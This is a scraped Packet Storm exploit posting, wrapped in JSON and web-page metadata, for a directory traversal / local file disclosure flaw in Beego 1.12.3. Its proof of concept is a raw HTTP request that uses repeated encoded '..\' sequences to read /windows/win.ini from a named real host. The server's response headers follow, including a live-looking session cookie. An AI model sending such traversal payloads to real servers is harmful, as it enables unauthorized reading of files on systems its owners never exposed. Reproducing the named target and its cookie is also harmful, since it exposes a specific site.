{“lastseen”:”2025-12-09T17:45:25″,”description”:”Beego version 1.12.3 suffers from a directory traversal vulnerability that allows for local file disclosure…”,”published”:”2025-12-09T00:00:00″,”modified”:”2025-12-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Beego 1.12.3 Directory Traversal \/ Local File Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:212602″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Beego 1.12.3 Directory Traversal \/ Local File Disclosure |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/beego\/beego |\\n =============================================================================================================================================\\n \\n [+] References : \\n \\n [+] Summary : The vulnerability confirmed here is a Directory Traversal \/ Local File Disclosure affecting an application running on Beego 1.12.3.\\n \\n [+] POC :\\t\\n \\n GET \/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c\/windows\/win.ini HTTP\/1.1\\n Host: door.casdoor.com\\n Connection: Keep-alive\\n Accept-Encoding: gzip,deflate\\n User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.21 (KHTML, like Gecko) Chrome\/41.0.2228.0 Safari\/537.21\\n Accept: *\/*\\n \\n Response\\n HTTP\/1.1 200 OK\\n Accept-Ranges: bytes\\n Content-Length: 92\\n Content-Type: text\/plain; charset=utf-8\\n Date: Sat, 06 Dec 2025 14:35:45 GMT\\n Last-Modified: Sat, 08 May 2021 08:18:31 GMT\\n Server: beegoServer:1.12.3\\n Set-Cookie: casdoor_session_id=891e4bf2d09b3240b7d1dd82ceba5c0f; Path=\/; Expires=Mon, 05 Jan 2026 14:35:45 GMT; Max-Age=2592000; HttpOnly\\n Original-Content-Encoding: gzip\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212602″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212602\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-09T17:45:25″,”description”:”Beego version 1.12.3 suffers from a directory traversal vulnerability that allows for local file disclosure…”,”published”:”2025-12-09T00:00:00″,”modified”:”2025-12-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Beego 1.12.3 Directory Traversal \/ Local File Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:212602″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | #…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-29730","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n